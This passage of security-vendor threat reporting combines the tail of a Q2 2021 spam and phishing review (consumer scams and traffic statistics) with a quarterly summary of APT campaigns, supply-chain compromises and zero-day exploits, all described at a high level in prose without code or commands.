Mailed items were the focus of one other fraudulent scheme. Websites appeared offering people the chance to buy out others’ parcels that for some reason could not reach the intended recipients. The “service” was positioned as a lottery — the buyer paid only for the weight of the parcel (the bigger it was, the higher the price), and its contents were not disclosed. To find out what was inside, the lucky owner of the abandoned parcel had to wait for it to arrive at the specified address. Which it didn’t. According to the mail company Russian Post, when the storage period expires, registered items (parcels, letters, postcards, EMS items) are sent to the return address at the sender’s expense. If the sender does not collect the returned item within the storage period, it is considered “unclaimed” and stored for a further six months, after which it is destroyed. In other words, ownerless parcels are not sold. Therefore, any offer to buy them is evidently a scam.

New movies: pay for the pleasure of not watching

Late April saw the annual Oscars ceremony in Hollywood. Movies nominated for an Academy award naturally attract public as well as cybercriminal attention. As a consequence, fake websites popped up offering free viewings and even downloads of Oscar contenders. After launching a video, the visitor of the illegal movie theater was shown several clips of the film (usually taken from the official trailer), before being asked to pay a small subscription fee to continue watching. However, after payment of the “subscription” the movie screening did not resume; instead the attackers had a new bank account to play with.

In fact, almost any big-budget movie is accompanied by the appearance of fake websites offering video or audio content long before its official release. Kaspersky found fake sites supposedly hosting Friends: The Reunion, a special episode of the popular sitcom. Fans who tried to watch or download the long-awaited continuation were redirected to a Columbia Pictures splash screen. After a few seconds, the broadcast stopped, replaced by a request to pay a nominal fee.

Messenger spam: WhatsApp with that?

In messenger-based spam, we continued to observe common tricks to get users to part with a small amount of money. Victims were asked, for example, to take a short survey about WhatsApp and to send messages to several contacts in order to receive a prize. Another traditional scam aims to persuade the user that they are the lucky winner of a tidy sum. Both scenarios end the same way: the scammers promise a large payout, but only after receiving a small commission.

WhatsApp was bought by Facebook in 2014. In early 2021, the two companies’ symbiotic relationship became a hot topic in connection with WhatsApp’s new privacy policy, allowing the messenger to exchange user information with its parent company. Cybercriminals took advantage of the rumor mill about the two companies. They set up fake websites inviting users to a WhatsApp chat with “beautiful strangers”. But when attempting to enter the chat room, the potential victim landed on a fake Facebook login page.

Emails with a link pointing to a fake WhatsApp voice message most likely belong to the same category. By following it, the recipient risks not only handing over their personal data to the attackers, but also downloading malware to their computer or phone.

Investments and public property scams

Offers of quick earnings with minimal effort remain one of the most common types of fraud. In Q2 2021, cybercriminals diversified their easy-money schemes. Email recipients were invited to invest in natural resources (oil, gas, etc.) or cryptocurrency secured by these resources. The topic of gas surfaced also in more conventional compensation scams. To make their offers more credible, cybercriminals used the brands of large companies. Having accepted investments, the scammers and their sites quickly disappeared along with the victims’ money.

For more suspicious minds, the cybercriminals set up a fake Gazprom anti-fraud website, where they posed as company employees, promising to compensate victims’ losses. The cybercriminals claimed that those who had paid more than 60,000 rubles were entitled to compensation; however, the attacks were not targeted. Most likely, the scammers were counting on users being curious about whether they could claim compensation. Naturally, the help of the “anti-fraudsters” was not without strings attached, despite the advertised free consultation. “Clients” who filled out the form were asked to pay a small fee for the refund, whereupon the “consultants” vanished without compensating so much as a dime.

Another high-earning scam cited client payouts under VTB Invest, VTB Bank’s digital asset management solution. Using the bank’s logos, the fraudsters offered “active banking users” the opportunity to receive “payout from investors.” After filling out the application form, indicating name, phone number and email, the potential victim saw a message stating that they are to receive a certain amount of money. Although the cybercriminals assured that no commission was payable, to receive the “payout” the applicant was required to provide bank card details or deposit a small sum, ostensibly to verify the account. In other words, it was the usual scheme in a different wrapper.

Statistics: spam

Proportion of spam in mail traffic

After a prolonged decline, the share of spam in global mail traffic began to grow again in Q2 2021, averaging 46.56%, up 0.89 p.p. against the previous reporting period.

Share of spam in global mail traffic, Q1 and Q2 2021

A look at the data by month shows that, having troughed in March (45.10%), the share of spam in global mail traffic rose slightly in April (45.29%), with further jumps in May (46.35%) and June (48.03%), which is comparable to Q4 2020.

Source of spam by country

The TOP 10 spam-source countries remained virtually unchanged from the first quarter. Russia (26.07%) is still in first place, its share having increased by 3.6 p.p., followed by Germany (13.97%) and the US (11.24%), whose contribution to the global flow of spam decreased slightly. China (7.78%) remains in fourth position.

Source of spam by country, Q2 2021

The Netherlands (4.52%), France (3.48%) and Spain (2.98%) held on to fifth, sixth and seventh, respectively. Only the last three positions in the TOP 10 experienced a slight reshuffle: Poland (1.69%) dropped out of the ranking, falling to 11th place, while Japan (2.53%) moved up to eighth. Brazil (2.27%) remained in ninth spot, while the last line in the ranking was claimed by India (1.70%).

Malicious mail attachments

Mail Anti-Virus blocked 34,224,215 malicious attachments in Q2, almost 4 million fewer than in the first three months of 2021.

Number of Mail Anti-Virus triggerings, Q1 and Q2 2021

Peak malicious activity came in June, when Kaspersky solutions blocked more than 12 million attachments, while May was the quietest with only 10.4 million.

Malware families

In Q2, Trojans from the Badun family (7.09%) were the most common malicious attachments in spam, their share having increased by 1.3 p.p. These malicious programs, disguised as electronic documents, are often distributed in archives. In contrast, Agensla Trojans (6.65%), which specialize in stealing credentials, shed 2.26 p.p. and dropped to second place. The Taskun family (4.25%), which exploits Windows Task Scheduler, rounds out the TOP 3. These Trojans, like Badun, are gaining popularity.

TOP 10 malware families in mail traffic, Q2 2021

Exploits for CVE-2017-11882 (4.07%), an Equation Editor vulnerability popular with cybercriminals, gave ground and dropped to fourth place. Next come malicious ISO disk images (3.29%). Sixth and eighth places were occupied by Noon spyware Trojans, which infect any (2.66%) or only 32-bit (2.47%) versions of Windows. Androm backdoors (2.55%) lie in seventh position, while the TOP 10 is rounded out by malicious documents in the SAgent (2.42%) and Agent (2.11%) families.

TOP 10 malicious attachments, Q2 2021

The TOP 10 attachments in spam differs only slightly from the ranking of malware families. The most widespread representative of the Agent family fell short of the TOP 10, but the ranking did find room for a Trojan from the Crypt family (2.06%), which includes heavily obfuscated and encrypted programs.

Countries targeted by malicious mailings

More than anywhere else, Kaspersky solutions blocked malicious attachments on user devices in Spain (9.28%). The share of this country grew slightly against Q1 2021, adding 0.54 p.p. Second place was retained by Italy (6.38%), despite losing 1.21 p.p. Germany (5.26%) and Russia (5.82%) swapped places in Q2, while the UAE (5.36%) remained fourth, its share practically unchanged.

Countries targeted by malicious spam, Q2 2021

Further down in the Top 10 countries by number of users who came across malicious attachments in Q2 2021 are Vietnam (4.71%), Mexico (4.23%), Turkey (3.43%), Brazil (2.91%) and Malaysia (2.53%).

Statistics: phishing

In phishing terms, Q2 2021 was fairly uneventful. The Anti-Phishing system detected and blocked 50,398,193 attempted redirects, with only 3.87% of our users encountering such phishing links.

Geography of phishing attacks

Looking at the share of users by country on whose devices the Anti-Phishing system was triggered, we see that Brazil (6.67%), which lost first place last quarter, is back at the top. It did not pull far ahead of Israel (6.55%) and France (6.46%), which topped the Q1 list.

Geography of phishing attacks, Q2 2021

Top-level domains

The traditional leader among top-level domain zones used by cybercriminals to post phishing pages is COM (31.67%). The ORG domain (8.79%) moved up to second place, pushing XYZ (8.51%) into third.

Top-level domain zones most commonly used for phishing, Q2 2021

The fourth most popular domain zone among cybercriminals in Q2 was China’s CN (3.77%), followed by NET (3.53%). Russia’s RU (2.98%) dropped to sixth place, and Tokelau’s TK (1.65%) to eighth. Note also the cybercriminals’ preference for international domain zones (six of the ten lines in this quarter’s ranking).

Organizations under attack

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

For the first time since the start of the pandemic, online stores (19.54%) vacated the first line in the ranking of organizations most often used by cybercriminals as bait. Global internet portals (20.85%) stepped in as this quarter’s leader. Moreover, the share of both categories increased relative to Q1: by 3.77 and 5.35 p.p., respectively. Third place belongs to banks (13.82%), which gained 3.78 p.p. in Q2.

Distribution of organizations whose users were targeted by phishers, by category, Q2 2021

Overall, the list of the most popular organization categories among cybercriminals remained practically unchanged since the previous quarter, except that the shares of instant messengers (6.27%) and social networks (7.26%) almost drew level, and phishers preferred financial services (2.09%) to IT companies (1.68%).


In Q2, as we expected, cybercriminals continued to hunt for corporate account credentials and exploit the COVID-19 theme. A curious takeaway was the spike in investment-related activity. On the whole, however, the quarter did not deliver any surprises.

As for Q3 forecasts, the share of cyberattacks on the corporate sector is likely to stay the same. This is because remote working has established a firm foothold in the labor market. Also, the COVID-19 topic is unlikely to disappear from spam. And if the current crop of vaccination and compensation scams weren’t enough, fraudsters could start utilizing newly identified strains of the virus to add variety and topicality to their schemes. What’s more, during the vacation season, pandemic or not, we expect an increase in demand for intercity and international travel; as a result, the risk of encountering fake websites when buying tickets or booking accommodation will rise. Lastly, we will likely see waves of tourist-targeted attacks during major sporting occasions, such as the Olympic Games in Japan. Such events are always accompanied by thematic spam.

29 July 2021

APT trends report Q2 2021

For more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q2 2021.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

Investigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, “FourteenHi”, in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.

FourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.

Although we couldn’t directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.

Europe

Russian-speaking activity

On May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven’t been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it “HotCousin”. The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.

Chinese-speaking activity

While investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware’s artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named “Cheat Engine” to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster “GhostEmperor”.

APT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and purposes as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known manufacturer specializes in small enterprise routers and network devices. So far, we don’t know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.

Following our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore’s shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.

A Chinese-speaking APT related to activity known as “new ControllX” compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.

While investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named “QSC”, which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.

Earlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants – WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant’s activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.

We discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call “TPCon”, as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call “evsroin”, used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found multiple additional malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.

Middle East

BlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group’s unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group’s activity.

We previously covered a WildPressure campaign against targets in the Middle East. Keeping track of the threat actor’s malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the “client” programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named “Guard”. Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol are quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure’s activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.

We discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant – a VBS script. The VBS script’s main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.

GoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor’s primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanying detection logs, portrays a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.

Southeast Asia and Korean Peninsula

The ScarCruft group is a geopolitically motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in Operation PowerFall. Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed “ATTACK-SYSTEM”, also used multi-stage shellcode infection to deliver the same final payload named “BlueLight”. BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.

In May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed “Palwan”. Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don’t deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.

BlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff’s “SnatchCrypto” campaign in 2020, the group’s strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim’s machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain- or cryptocurrency-related company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.

We have discovered Andariel activity using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion – that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.

We recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed LuminousMoth. Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim’s Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.

We recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims’ devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control whether Dropbox or another, hardcoded server is used to exfiltrate stolen files.

Other interesting discoveries

Expanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.

Various marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as “Moses”. “Moses” appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from “Moses”. While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren’t able to capture a full exploit chain, so we don’t know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.

In another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of its early activity last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group’s operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed “Samurai”, as well as describing a broader set of targets than the one documented thus far.

On 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between 31 January and 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user’s execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash Uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven’t been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash Uploader script, as well as identify some possibly associated additional malicious servers.

An e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it’s still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studios on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.

A few days after April’s Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as “April 2021 Security Update Installers”. They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, “code.microsoft.com”. Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft’s infrastructure. In fact, an unauthorized party took over the dangling subdomain “code.microsoft.com” and configured it to resolve to their Cobalt Strike host, set up around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn’t affect unsuspecting visitors to this website because of the required unique user agent.

On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 – RS5, 18362 – 19H1, 18363 – 19H2, 19041 – 20H1, 19042 – 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a “remote shell”-style backdoor which in turn connects to the C2 to get commands. So far, we haven’t been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity PuzzleMaker.

On April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered “out-of-cycle” update and workaround packages to provide a solution for the multiple vulnerabilities.

Cooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.

Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual’s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we’ve seen in Q2 2021:

  • We have reported several supply-chain attacks in recent months. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.
  • APT groups mainly use social engineering to gain an initial foothold in a target network. However, we’ve seen a rise in APT threat actors leveraging exploits to gain that initial foothold – including the zero-days developed by the exploit developer we call “Moses” and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.
